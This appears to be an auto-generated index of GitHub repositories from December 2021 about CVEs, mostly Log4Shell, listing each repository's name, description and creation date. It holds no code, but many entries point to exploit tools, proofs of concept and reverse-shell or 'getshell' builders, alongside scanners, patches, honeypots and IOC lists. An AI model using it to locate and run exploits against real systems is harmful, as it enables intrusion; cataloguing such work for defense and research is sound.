Presents how to exploit CVE-2021-44228 vulnerability. : MarceloLeite2604/log4j-vulnerability create time: 2021-12-30T19:10:21Z
no description : cckuailong/log4j_RCE_CVE-2021-44832 create time: 2021-12-29T07:50:05Z
一个针对shiro反序列化漏洞(CVE-2016-4437)的快速利用工具/A simple tool targeted at shiro framework attacks with ysoserial. : 4nth0ny1130/shisoserial create time: 2021-12-23T16:29:59Z
no description : Rinkal26/CVE-2020-17087 create time: 2021-12-30T10:43:47Z
no description : wuppp/cve-2021-45232-exp create time: 2021-12-29T07:32:30Z
Script to create a log4j (CVE-2021-44228) exploit with support for different methods of getting a reverse shell : a5tra/log4j-exploit-builder create time: 2021-12-29T17:41:48Z
Auerswald VoIP System Secret Backdoors -PoC : pussycat0x/CVE-2021-40859 create time: 2021-12-29T15:15:38Z
no description : Asbatel/CVE-2019-5736_POC create time: 2021-12-29T13:48:42Z
no description : trganda/CVE-2021-22204 create time: 2021-12-29T13:41:35Z
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more. : puzzlepeaches/Log4jUnifi create time: 2021-12-24T13:18:49Z
no description : d4rk30/CVE-2017-12943 create time: 2021-12-29T07:58:23Z
Discover Log4Shell vulnerability [CVE-2021-45105] : name/log4j create time: 2021-12-29T08:22:41Z
Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. : Bhagwatjadhav1997/tryhackme-Solar-exploiting-log4j create time: 2021-12-29T07:46:28Z
基于GO的exp和poc : damit5/CVE-2020-11546 create time: 2021-12-29T06:51:36Z
CVE-2021-45232 POC : Ifory885/CVE-2021-45232 create time: 2021-12-29T05:43:12Z
no description : LTiDi2000/CVE-2021-45232 create time: 2021-12-28T17:56:59Z
no description : Ilovewomen/cve-2021-45232 create time: 2021-12-29T01:01:16Z
CVE-2019-9053 Exploit for Python 3 : 4nner/CVE-2019-9053 create time: 2021-12-28T16:30:12Z
CVE-2021-45232 RCE : shakeman8/CVE-2021-45232-RCE create time: 2021-12-28T13:49:18Z
Fix: CVE-2021-44228 4LOGJ : tslenter/RS4LOGJ-CVE-2021-44228 create time: 2021-12-28T13:32:16Z
Auerswald COMpact 8.0B Backdoors exploit : 419066074/CVE-2021-40859 create time: 2021-12-28T06:05:42Z
no description : badboycxcc/CVE-2021-45232-POC create time: 2021-12-28T13:08:34Z
A vulnerability scanner that detects CVE-2021-45232 vulnerabilities. : Osyanina/westone-CVE-2021-45232-scanner create time: 2021-12-28T11:36:38Z
no description : pingpongcult/CVE-2021-4523 create time: 2021-12-28T11:00:29Z
no description : Ravid-CheckMarx/CVE-2021-44228-Apache-Log4j-Rce-main create time: 2021-12-27T17:06:26Z
Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit : MRacumen/CVE-2021-40444 create time: 2021-12-28T06:33:25Z
Auerswald COMpact 8.0B Backdoors exploit : dorkerdevil/CVE-2021-40859 create time: 2021-12-28T04:51:58Z
Lavel Expliot CVE-2018-15133 / An Expliot I wrote a long time ago for a CTF box. : NatteeSetobol/CVE-2018-15133-Lavel-Expliot create time: 2021-12-28T02:33:13Z
PoC for CVE-2021-45041 : manuelz120/CVE-2021-45041 create time: 2021-12-27T19:29:34Z
Quick and dirty scanner, hitting common ports looking for Log4Shell (CVE-2021-44228) vulnerability : LinkMJB/log4shell_scanner create time: 2021-12-27T19:36:29Z
log4j-paylaod generator : A generic payload generator for Apache log4j RCE CVE-2021-44228 : yesspider-hacker/log4j-payload-generator create time: 2021-12-27T18:02:15Z
Log4Shell (Cve-2021-44228) Proof Of Concept : s-retlaw/l4s_poc create time: 2021-12-27T16:45:58Z
SuperWebMailer RCE : Official-BlackHat13/CVE-2020-11546 create time: 2021-12-27T14:18:31Z
Detection script for CVE-2021-42278 and CVE-2021-42287 : cybersecurityworks553/noPac-detection create time: 2021-12-27T13:10:45Z
IOCs for CVE-2021-44228 : cungts/VTI-IOCs-CVE-2021-44228 create time: 2021-12-27T09:51:13Z
Log4Shell (CVE-2021-44228) is a zero-day vulnerability in Log4j : mazhar-hassan/log4j-vulnerability create time: 2021-12-27T06:39:40Z
CVE-2021-44228 : ceyhuncamli/Log4j_Attacker_IPList create time: 2021-12-27T06:29:12Z
no description : Ming119/CVE-2021-41773_Exploit create time: 2021-12-26T16:48:57Z
opencast cve-2021-43821敏感信息泄露漏洞环境 : Jackey0/opencast-cve-2021-43821-env create time: 2021-12-26T09:04:43Z
no description : Dilshan-Eranda/CVE-2020-13699 create time: 2021-12-26T00:06:27Z
This is a basic ROP based exploit for CVE 2020-14871. CVE 2020-14871 is a vulnerability in Sun Solaris systems libpam library, and exploitable over ssh : robidev/CVE-2020-14871-Exploit create time: 2021-12-25T21:27:59Z
Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell. : bsigouin/log4shell-vulnerable-app create time: 2021-12-24T20:00:12Z
this repository contains a POC of CVE-2021-44228 (log4j2shell) as part of a security research : ToxicEnvelope/XSYS-Log4J2Shell-Ex create time: 2021-12-25T12:53:13Z
CVE-2019-9053 SQL Injection for CMS Made Simple for versions < 2.2.9 : BernieLane/CMS-Made-Simple-SQLi create time: 2021-12-25T03:18:26Z
Collection of materials relating to FORCEDENTRY, will eventually delete this repo and migrate the materials to my main exploit repo once finished : jeffssh/CVE-2021-30860 create time: 2021-12-25T03:00:01Z
A simple exploitation guide for CVE-2021-44228. : CrashOverflow/Log4J-POC create time: 2021-12-24T19:26:36Z
This project is exploit for some docker containers with similar to vulnerability code: CVE-2020-35191 : megadimenex/MegaHiDocker create time: 2021-12-24T18:59:31Z
Log4j2 CVE-2021-44228 Vulnerability POC in Apache Tomcat : many-fac3d-g0d/apache-tomcat-log4j create time: 2021-12-24T18:54:46Z
Small example repo for looking into log4j CVE-2021-44228 : LiveOverflow/log4shell create time: 2021-12-15T19:59:38Z
Log4Shell (CVE-2021-44228) docker lab : axelcurmi/log4shell-docker-lab create time: 2021-12-18T19:30:35Z
A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability. : cybersecurityworks553/log4j-shell-csw create time: 2021-12-24T09:26:38Z
Log4Shell(CVE-2021-45046) Sandbox Signature : CaptanMoss/Log4Shell-Sandbox-Signature create time: 2021-12-24T09:02:55Z
log4j / log4shell IoCs from multiple sources put together in one big file (IPs) more coming soon (CVE-2021-44228) : hackinghippo/log4shell_ioc_ips create time: 2021-12-13T16:39:16Z
general purpose workaround for the log4j CVE-2021-44228 vulnerability : grimch/log4j-CVE-2021-44228-workaround create time: 2021-12-24T04:23:17Z
CVE-2021-44228 检查工具 : ainrm/log4j-scan create time: 2021-12-24T02:31:47Z
Discover and remediate Log4Shell vulnerability [CVE-2021-45105] : sakuraji-labs/sakuraji_log4j create time: 2021-12-23T21:45:42Z
no description : dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1 create time: 2021-12-23T17:46:02Z
Environment with vulnerable kernel for exploitiation of CVE-2021-44733 : pjlantz/optee-qemu create time: 2021-12-23T17:45:35Z
CVE-2020-0683 - Windows MSI “Installer service” Elevation of Privilege : padovah4ck/CVE-2020-0683 create time: 2020-02-11T16:42:34Z
Apache 远程代码执行 (CVE-2021-42013)批量检测工具:Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。 : asaotomo/CVE-2021-42013-Apache-RCE-Poc-Exp create time: 2021-12-23T14:46:41Z
Apache HTTP Server是开源网页服务器的Apache(Apache)基金会。该服务器具有快速、可靠和可通过简单的API进行扩充的特点,发现修复CVE-2021-41773的Apache HTTP Server 2.4.50是不够的。攻击者可以使用路径遍历攻击映射URL到目录之外的指令配置的别名。如果这些请求可能会成功,这些请求可能会成功,但这些目录不受通常默认配置“要求全部拒绝”。如果CGI脚本还启用了这些别名路径,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响更早版本。 : asaotomo/CVE-2021-42013-Apache-RCE-POC-EXP create time: 2021-12-23T14:09:16Z
Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell (CVE-2021-44228). : lucab85/ansible-role-log4shell create time: 2021-12-23T13:24:41Z
no description : dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105-v create time: 2021-12-23T11:41:25Z
no description : dileepdkumar/https-github.com-dileepdkumar-https-github.com-pravin-pp-log4j2-CVE-2021-45105 create time: 2021-12-23T11:40:49Z
no description : dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105 create time: 2021-12-23T11:38:32Z
Log4Shell mitigation (CVE-2021-44228) - search and remove JNDI class from log4j.jar files on the system with Powershell (Windows) : sysadmin0815/Fix-Log4j-PowershellScript create time: 2021-12-17T09:09:56Z
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability : TaroballzChen/CVE-2021-44228-log4jVulnScanner-metasploit create time: 2021-12-23T01:59:03Z
Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228 : 0x3SC4L4T3/Apache-Log4j-POC create time: 2021-12-22T22:44:07Z
vsFTPd 2.3.4 Backdoor Exploit CVE-2011-2523 : whoamins/vsFTPd-2.3.4-exploit create time: 2021-12-22T20:51:35Z
Log4JChecker checks for CVE-2021-44228 vulnerability : NatteeSetobol/Log4JChecker create time: 2021-12-22T15:15:12Z
no description : Mesh3l911/CVE-2021-44659 create time: 2021-12-22T14:46:21Z
A tool to automatically obtain a shell using CVE-2021-44228. EDUCATIONAL AND TESTING PURPOSES ONLY. UNAUTHORISED USE OF THIS PROGRAM CAN RESULT IN PROCECUTION. : djungeldan/Log4Me create time: 2021-12-19T19:37:48Z
CVE-2021-44228-FIX-JARS : asyzdykov/cve-2021-44228-fix-jars create time: 2021-12-22T10:16:22Z
Generic Scanner for Apache log4j RCE CVE-2021-44228 : r00thunter/Log4Shell create time: 2021-12-22T09:15:47Z
A Smart Log4Shell/Log4j/CVE-2021-44228 Scanner : ossie-git/log4shell_sentinel create time: 2021-12-22T08:35:04Z
CVE-2021-33739 PoC Analysis : giwon9977/CVE-2021-33739_PoC_Analysis create time: 2021-09-24T03:33:02Z
CVE-2021-44228 - Log4J Start To End Guide Book : NitinGavhane/CVE-2021-44228---Log4J create time: 2021-12-22T05:16:59Z
CVE-2021-22205 的批量检测脚本 : gardenWhy/Gitlab-CVE-2021-22205 create time: 2021-12-22T04:30:17Z
Log4Shell Demo with AWS : BabooPan/Log4Shell-CVE-2021-44228-Demo create time: 2021-12-22T03:34:40Z
Ansible playbook to verify target Linux hosts using the official Red Hat Log4j detector script : lucab85/log4j-cve-2021-44228 create time: 2021-12-21T22:14:24Z
no description : halencarjunior/grafana-CVE-2021-43798 create time: 2021-12-21T20:08:22Z
Log4j2 CVE-2021-44228 hack demo for a springboot app : rejupillai/log4j2-hack-springboot create time: 2021-12-21T17:40:02Z
Decrypt FortiGate configuration secrets : gquere/CVE-2019-6693 create time: 2021-12-21T15:28:00Z
POC for CVE-2021-44228 within Springboot : mn-io/log4j-spring-vuln-poc create time: 2021-12-21T15:00:58Z
ConnectWise also known as ScreenConnect CVE-2019-16516 : czz/ScreenConnect-UserEnum create time: 2021-12-17T21:34:20Z
Blog Sample Code : motikan2010/RASP-CVE-2021-44228 create time: 2021-12-21T13:30:37Z
Zoneminder 未授权访问Poc:ZoneMinder v1.30和v1.29捆绑的Apache HTTP Server配置中存在信息泄露和认证绕过漏洞,允许远程未认证攻击者浏览web根目录下的所有目录。 : asaotomo/CVE-2016-10140-Zoneminder-Poc create time: 2021-12-21T13:17:10Z
no description : gps1949/CVE-2021-43798 create time: 2021-12-21T10:04:41Z
This repo contains IoCs which are associated with exploitation of CVE-2021-4428. : CERT-hr/Log4Shell create time: 2021-12-21T09:17:08Z
Python script to detect Log4Shell Vulnerability CVE-2021-44228 : Ghost086/Log4Shell-Scanner create time: 2021-12-21T08:13:35Z
相关的复现和文档 : xx-zhang/apache-log4j2-CVE-2021-44228 create time: 2021-12-21T06:03:18Z
Webmin Local File Include (unauthenticated) : windsormoreira/CVE-2006-3392 create time: 2021-12-21T04:18:21Z
Samsung Printer SCX-6X55X Improper Access Control : windsormoreira/CVE-2021-42913 create time: 2021-12-21T04:26:11Z
Scan and patch tool for CVE-2021-44228 and related log4j concerns. : sassoftware/loguccino create time: 2021-12-21T03:01:36Z
Windows Common Log File System Driver POC : KaLendsi/CVE-2021-43224-POC create time: 2021-12-21T01:51:41Z
Proof of Concept for CVE-2021-43891 : parsiya/code-wsl-rce create time: 2021-12-20T21:30:51Z
POC of CVE-2021-45105 : hackername0102/log4j create time: 2021-12-20T21:27:55Z
Vulnerable web application to test CVE-2021-42281 / log4shell and forensic artifacts from an example attack : snapattack/damn-vulnerable-log4j-app create time: 2021-12-20T18:51:52Z
Bash que instala los sploit CVE-2017-0781 y CVE-2017-0785 y lo necesario para su usos. : CarlosDelRosario7/sploit-bX create time: 2021-12-20T18:14:36Z
Application vulnerable to CVE-2021-44228. : erickrr-bd/TekiumLog4jApp create time: 2021-12-20T17:59:56Z
Windows Batch Scrip to Fix the log4j-issue-CVE-2021-44228 : chandru-gunasekaran/log4j-fix-CVE-2021-44228 create time: 2021-12-20T15:39:20Z
no description : intel-xeon/CVE-2021-44228---detection-with-PowerShell create time: 2021-12-20T15:38:07Z
Script en bash que permite identificar la vulnerabilidad Log4j CVE-2021-44228 de forma remota. : julian911015/Log4j-Scanner-Exploit create time: 2021-12-20T15:22:50Z
no description : offensity/CVE-2019-0708 create time: 2021-12-20T14:57:23Z
Remote Mouse GUI 3.008 - Local Privilege Escalation : LeoBreaker1411/CVE-2021-35448 create time: 2021-12-20T15:15:15Z
log4j2 RCE漏洞(CVE-2021-44228)内网扫描器,可用于在不出网的条件下进行漏洞扫描,帮助企业内部快速发现Log4jShell漏洞。 : Y0-kan/Log4jShell-Scan create time: 2021-12-20T13:41:35Z
Shell script to fix Log4J jar files from CVE-2021-44228, a.k.a., #Log4Shell : dmitsuo/log4shell-war-fixer create time: 2021-12-20T13:18:57Z
Log4j 漏洞本地检测脚本。 Scan all java processes on your host to check weather it's affected by log4j2 remote code execution(CVE-2021-45046) : lijiejie/log4j2_vul_local_scanner create time: 2021-12-20T12:07:41Z
A script to search, scrape and scan for Apache Log4j CVE-2021-44228 affected files using Google dorks : JagarYousef/log4j-dork-scanner create time: 2021-12-20T12:01:52Z
log4j2 dos exploit,CVE-2021-45105 exploit,Denial of Service poc : iAmSOScArEd/log4j2_dos_exploit create time: 2021-12-20T10:52:20Z
no description : bumheehan/cve-2021-44228-log4j-test create time: 2021-12-20T11:07:21Z
no description : ramirosantos/POC-for-CVE-2021-44228-with-Kali create time: 2021-12-20T10:40:32Z
no description : ramirosantos/Apache-Log4j-Zero-Day-aka-Log4Shell-aka-CVE-2021-44228 create time: 2021-12-20T10:34:06Z
log4j2 Log4Shell CVE-2021-44228 proof of concept : spasam/log4j2-exploit create time: 2021-12-20T03:16:01Z
a project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD : ArkAngeL43/f-for-java create time: 2021-12-20T01:31:06Z
Replicating CVE-2021-45105 : tejas-nagchandi/CVE-2021-45105 create time: 2021-12-19T23:22:25Z
L4Shunter - Log4Shell Hunter - Remote scanner for CVE-2021-44228 or CVE-2021-45046 : sudo6/l4shunter create time: 2021-12-19T21:39:28Z
Exploiting CVE-2021-44228 in vCenter for remote code execution and more. : puzzlepeaches/Log4jCenter create time: 2021-12-19T14:48:30Z
A Proof of Concept of the Log4j vulnerabilities (CVE-2021-44228) over Java-RMI : Labout/log4shell-rmi-poc create time: 2021-12-19T17:53:31Z
A telegram bug that allows to bruteforce and find hidden mobile phone number of any user (CVE-2019-15514) : graysuit/CVE-2019-15514 create time: 2021-12-10T19:03:53Z
A fully automated, accurate, and extensive scanner for finding log4j RCE CVE-2021-44228 : Rk-000/Log4j_scan_Advance create time: 2021-12-19T14:20:54Z
Demo to show how Log4Shell / CVE-2021-44228 vulnerability works : mschmnet/Log4Shell-demo create time: 2021-12-19T10:57:16Z
CVE-2021-40444 : 34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit create time: 2021-12-19T08:16:07Z
Identifying all log4j components across on local windows servers. CVE-2021-44228 : KeysAU/Get-log4j-Windows-local create time: 2021-12-19T07:35:01Z
Vulerability analysis, patch management and exploitation tool CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104 : TheInterception/Log4J-Simulation-Tool create time: 2021-12-19T05:13:25Z
An Inspec profile to check for Log4j CVE-2021-44228 and CVE-2021-45046 : trickyearlobe/inspec-log4j create time: 2021-12-19T04:04:57Z
no description : kkyehit/log4j_CVE-2021-44228 create time: 2021-12-19T03:47:54Z
Searches filesystem for CVE-2021-44228 and CVE-2021-45046 vulnerable instances, including embedded (jar/war/zip) packaged ones. : HynekPetrak/log4shell_finder create time: 2021-12-14T22:27:14Z
This is a showcase how the Log4J vulnerability (CVE-2021-44228) could be explored. This code is safe to run, but understand what it does and how it works! : otaviokr/log4j-2021-vulnerability-study create time: 2021-12-18T20:53:06Z
Automated pentesting tools and vulnerability fixes for Log4Shell CVE-2021-44228 / CVE-2021-45046 / CVE-2021-4104 : TheInterception/Log4JPentester create time: 2021-12-18T17:59:24Z
Detections for CVE_2021_44228 aka Log4j : initconf/log4j create time: 2021-12-18T17:30:28Z
no description : 111coding/log4j_temp_CVE-2021-44228 create time: 2021-12-15T14:01:23Z
A fun activity using a packet capture file from the log4j exploit (CVE-2021-44228) : Apipia/log4j-pcap-activity create time: 2021-12-18T16:09:49Z
no description : pravin-pp/log4j2-CVE-2021-45105 create time: 2021-12-18T14:24:46Z
Detect and fix log4j log4shell vulnerability (CVE-2021-44228) : Nanitor/log4fix create time: 2021-12-16T11:54:11Z
Scan systems and docker images for potential log4j vulnerabilities. Able to patch (remove JndiLookup.class) from layered archives. Will detect in-depth (layered archives jar/zip/tar/war and scans for vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105). Binaries for Windows, Linux and OsX, but can be build on each platform supported by supported Golang. : dtact/divd-2021-00038--log4j-scanner create time: 2021-12-12T12:16:07Z
Log4j_dos_CVE-2021-45105 : cckuailong/Log4j_dos_CVE-2021-45105 create time: 2021-12-18T12:54:44Z
no description : ramirosantos/Spring-Boot-Log4j-CVE-2021-44228-Docker-Lab create time: 2021-12-18T12:50:28Z
no description : ramirosantos/CVE-2021-44228-poc create time: 2021-12-18T12:50:04Z
Self-contained lab environment that runs the exploit safely, all from docker compose : j3kz/CVE-2021-44228-PoC create time: 2021-12-18T12:42:04Z
Look for JAR files that vulnerable to Log4j RCE (CVE‐2021‐44228) : dwisiswant0/look4jar create time: 2021-12-18T11:39:38Z
no description : ludy-dev/cve-2021-45046 create time: 2021-12-18T11:43:56Z
An attempt to understand the log4j vulnerability by looking through the code : shivakumarjayaraman/log4jvulnerability-CVE-2021-44228 create time: 2021-12-18T11:23:35Z
A scanning suite to find servers affected by the log4shell flaw (CVE-2021-44228) with example to test it : suniastar/scan-log4shell create time: 2021-12-18T11:16:06Z
no description : shmilylty/cve-2021-22005-exp create time: 2021-12-18T08:18:50Z
CVE-2021-44228 Getshell : shakeman8/log4j_getshell create time: 2021-12-18T06:41:56Z
CVE-2021-4438 LOG4J - Remote excution : longnguyen-2k/log4j create time: 2021-12-18T04:26:44Z
no description : Pengfei-Lu/CVE-2021-44228-Apache-Log4j-Rce create time: 2021-12-18T00:58:32Z
can find, analyse and patch Log4J files because of CVE-2021-44228, CVE-2021-45046 : DANSI/PowerShell-Log4J-Scanner create time: 2021-12-18T00:51:46Z
A vulnerable device scanner for CVE-2021-44228 (Log4j) : sblmnl/Scan4j create time: 2021-12-17T20:46:34Z
A simple script to remove Log4J JndiLookup.class from jars in a given directory, to temporarily protect from CVE-2021-45046 and CVE-2021-44228. : lukepasek/log4jjndilookupremove create time: 2021-12-17T18:59:16Z
no description : VerveIndustrialProtection/CVE-2021-44228-Log4j create time: 2021-12-15T18:51:07Z
This project will help to test the Log4j CVE-2021-44228 vulnerability. : immunityinc/Log4j-JNDIServer create time: 2021-12-17T20:07:12Z
Docker images and k8s YAMLs for Log4j Vulnerability POC (Log4j (CVE-2021-44228 RCE Vulnerability) : ankur-katiyar/log4j-docker create time: 2021-12-17T19:50:40Z
no description : nu11secur1ty/CVE-2021-44228-VULN-APP create time: 2021-12-17T18:45:19Z
CVE-2021-44228 : ermohitrathore/detect-log4j-exploitable create time: 2021-12-17T18:03:50Z
A tool to analysis the log files from minecraft to scan potential security risks from the CVE-2021-44228 Log4J library exploit. : psychose-club/Saturn create time: 2021-12-12T19:42:47Z
no description : Nikolas-Charalambidis/cve-2021-44228 create time: 2021-12-17T17:23:47Z
Provide patched version of Log4J against CVE-2021-44228 and CVE-2021-45046 as well as a script to manually patch it yourself : Aschen/log4j-patched create time: 2021-12-17T16:26:12Z
A collection of IOCs for CVE-2021-44228 also known as Log4Shell : WatchGuard-Threat-Lab/log4shell-iocs create time: 2021-12-17T15:58:14Z
Log4Shell (CVE-2021-44228): descrizione, exploitation e rimedi : zane00/CVE-2021-44228 create time: 2021-12-17T10:36:16Z
no description : TheArqsz/CVE-2021-44228-PoC create time: 2021-12-10T23:40:39Z
Scan your IP network and determine hosts with possible CVE-2021-44228 vulnerability in log4j library. : metodidavidovic/log4j-quick-scan create time: 2021-12-17T12:49:59Z
The script "Py3-detect-log4j-12.2021.py" developed in Python 3 is responsible for detecting whether a list of URLs are vulnerable to CVE-2021-44228. : nx6110a5100/Py3-detect-log4j-12.2021 create time: 2021-12-17T13:09:19Z
Windows MSI Installer LPE (CVE-2021-43883) : jbaines-r7/shakeitoff create time: 2021-12-02T19:15:59Z
Java application vulnerable to the CVE-2021-44228 (a.k.a log4shell) vulnerability : GroupePSA/log4shell-honeypot create time: 2021-12-17T10:32:39Z
Scanner for the Log4j vulnerability dubbed Log4Shell (CVE-2021-44228) : scheibling/py-log4shellscanner create time: 2021-12-17T10:06:07Z
nginx 1.15.10 patch against cve-2021-23017 (ingress version) : niandy/nginx-patch create time: 2021-12-17T09:53:39Z
Log4j2 Vulnerability (CVE-2021-44228) : RenYuH/log4j-lookups-vulnerability create time: 2021-12-17T09:10:50Z
CVE-2021-44228 vulnerability in Apache Log4j library : Heliferepo/log4j create time: 2021-12-17T08:48:59Z
no description : rohankumardubey/CVE-2021-44228_scanner create time: 2021-12-17T08:32:20Z
CVE-2021-43798 Grafana任意文件读取 : k3rwin/CVE-2021-43798-Grafana- create time: 2021-12-17T07:03:32Z
PoC RCE Log4j CVE-2021-4428 para pruebas : Grupo-Kapa-7/CVE-2021-44228-Log4j-PoC-RCE create time: 2021-12-17T06:34:51Z
An automated, reliable scanner for the Log4Shell (CVE-2021-44228) vulnerability. : redhuntlabs/Log4JHunt create time: 2021-12-15T12:07:05Z
A lab demonstration of the log4shell vulnerability: CVE-2021-44228 : obscuritylabs/log4shell-poc-lab create time: 2021-12-17T04:20:40Z
CVE-2021-43798 Grafana 任意文件读取漏洞 POC+参数 : ScorpionsMAX/CVE-2021-43798-Grafana-POC create time: 2021-12-07T10:43:30Z
Test exploit of CVE-2021-44228 : wajda/log4shell-test-exploit create time: 2021-12-17T01:50:22Z
no description : AnYi-Sec/Log4j-CVE-2021-44228-EXP create time: 2021-12-17T01:19:37Z
Log4j - Multitool. Find & fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment : suuhm/log4shell4shell create time: 2021-12-16T23:13:09Z
Log4Shell Proof of Concept (CVE-2021-44228) : Kr0ff/CVE-2021-44228 create time: 2021-12-16T21:19:17Z
Samples of log4j library versions to help log4j scanners / detectors improve their accuracy for detecting CVE-2021-45046 and CVE-2021-44228. : mergebase/log4j-samples create time: 2021-12-16T18:12:29Z
no description : kannthu/CVE-2021-44228-Apache-Log4j-Rce create time: 2021-12-16T20:02:09Z
no description : Vulnmachines/log4j-cve-2021-44228 create time: 2021-12-16T18:42:08Z
Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading : kal1gh0st/MyLog4Shell create time: 2021-12-16T17:21:22Z
Detects vulnerable Log4J versions (CVE-2021-44228, CVE-2021-45046, etc) on your file-system within any application. It is able to even find instances that are hidden several layers deep. Works on Linux, Windows, and Mac, and everywhere else Java runs, too! : mergebase/log4j-detector create time: 2021-12-12T00:29:03Z
Applications that are vulnerable to the log4j CVE-2021-44228/45046 issue may be detectable by scanning jar, war, ear, zip files to search for the presence of JndiLookup.class. : hozyx/log4shell create time: 2021-12-16T17:22:17Z
log4j mitigation work : axisops/CVE-2021-44228 create time: 2021-12-16T16:42:44Z
no description : shubhayu-64/CVE-2021-38314 create time: 2021-12-16T15:27:59Z
Log4Shell CVE-2021-44228 Vulnerability Scanner and POC : gyaansastra/CVE-2021-44228 create time: 2021-12-16T15:04:23Z
CVE-2021-44228-Apache-Log4j : lonecloud/CVE-2021-44228-Apache-Log4j create time: 2021-12-16T14:31:14Z
Scanner local em Python para varredura e localização de versões vulneráveis do Log4j2, contemplando análise interna de arquivos JAR (CVE-2021-44228 e CVE-2021-45046) : andalik/log4j-scanner create time: 2021-12-16T14:29:05Z
no description : d3w201/CVE-2021-44228 create time: 2021-12-16T14:14:38Z
A honeypot for the Log4Shell vulnerability (CVE-2021-44228). : thomaspatzke/Log4Pot create time: 2021-12-15T22:30:34Z
Burp Active Scan extension to identify Log4j vulnerabilities CVE-2021-44228 an CVE-2021-45046 : DXC-StrikeForce/Burp-Log4j-HammerTime create time: 2021-12-16T13:25:03Z
Basic Vulnerable Spring Boot Application to Test CVE-2021-44228 : recanavar/vuln_spring_log4j2 create time: 2021-12-16T13:05:38Z
Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228) : korteke/log4shell-demo create time: 2021-12-16T12:44:24Z
Simple bash script to scan multiples url for log4j vulnerability (CVE-2021-44228) : Gyrfalc0n/scanlist-log4j create time: 2021-12-16T12:20:00Z
Local Bytecode Scanner for Log4JShell Vulnerability (CVE-2021-44228) : CodeShield-Security/Log4JShell-Bytecode-Detector create time: 2021-12-12T11:28:34Z
Stored XSS found in Vehicle Service Management System 1.0 application in Sourcecodester. : lohyt/-CVE-2021-41962 create time: 2021-12-16T10:52:13Z
CVE-2021-44228 vulnerability in Apache Log4j library | Log4j vulnerability scanner on Windows machines. : Joefreedy/Log4j-Windows-Scanner create time: 2021-12-16T10:37:16Z
Log4j漏洞(CVE-2021-44228)的Burpsuite检测插件 : snow0715/log4j-Scan-Burpsuite create time: 2021-12-16T09:58:02Z
log4shell (CVE-2021-44228) scanning tool : shamo0/CVE-2021-44228 create time: 2021-12-16T09:26:37Z
This Log4j RCE exploit originated from https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce : roxas-tan/CVE-2021-44228 create time: 2021-12-16T08:46:55Z
log4j vulnerability wrapper scanner for CVE-2021-44228 : dpomnean/log4j_scanner_wrapper create time: 2021-12-16T03:57:41Z
This script is used to perform a fast check if your server is possibly affected by CVE-2021-44228 (the log4j vulnerability). : rv4l3r3/log4v-vuln-check create time: 2021-12-16T01:38:25Z
log4j (CVE-2021-44228) Spring-boot web application with vulnerabilities : Auddn/ITF-log4shell-vulnapp create time: 2021-12-14T08:21:11Z
A Remote Code Execution PoC for Log4Shell (CVE-2021-44228) : ubitech/cve-2021-44228-rce-poc create time: 2021-12-15T23:00:25Z
Небольшой мод направленный на устранение уязвимости CVE-2021-44228 : LemonCraftRu/JndiRemover create time: 2021-12-11T15:48:03Z
CVE-2021-39685 Description and sample exploit for Linux USB Gadget overflow vulnerability : szymonh/inspector-gadget create time: 2021-12-15T14:28:00Z
Dockerized honeypot for CVE-2021-44228. : michaelsanford/Log4Shell-Honeypot create time: 2021-12-15T21:09:00Z
no description : aws-samples/kubernetes-log4j-cve-2021-44228-node-agent create time: 2021-12-15T20:17:41Z
Tools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228) : stripe/log4j-remediation-tools create time: 2021-12-14T21:47:04Z
Very simple Ansible playbook that scan filesystem for JAR files vulnerable to Log4Shell : pmontesd/log4j-cve-2021-44228 create time: 2021-12-15T19:21:39Z
no description : pravin-pp/log4j2-CVE-2021-45046 create time: 2021-12-15T19:19:52Z
To determine if a host is vulnerable to log4j CVE‐2021‐44228 : yahoo/check-log4j create time: 2021-12-15T18:47:39Z
we are providing DevOps and security teams script to identify cloud workloads that may be vulnerable to the Log4j vulnerability(CVE-2021-44228) in their AWS account. The script enables security teams to identify external-facing AWS assets by running the exploit on them, and thus be able to map them and quickly patch them : mitiga/log4shell-cloud-scanner create time: 2021-12-15T15:42:06Z
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 : alenazi90/log4j create time: 2021-12-15T19:15:00Z
A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228 : isuruwa/Log4j create time: 2021-12-15T16:01:36Z
CVE-2021-44228 demo webapp : MkTech-0-8YT3/CVE-2021-44228 create time: 2021-12-15T17:42:13Z
Honeypot for CVE-2021-44228 : wortell/log4j-honeypot create time: 2021-12-15T16:29:37Z
Replicating CVE-2021-45046 : tejas-nagchandi/CVE-2021-45046 create time: 2021-12-15T16:28:11Z
Scans for Log4j versions effected by CVE-2021-44228 : inettgmbh/checkmk-log4j-scanner create time: 2021-12-15T16:21:26Z
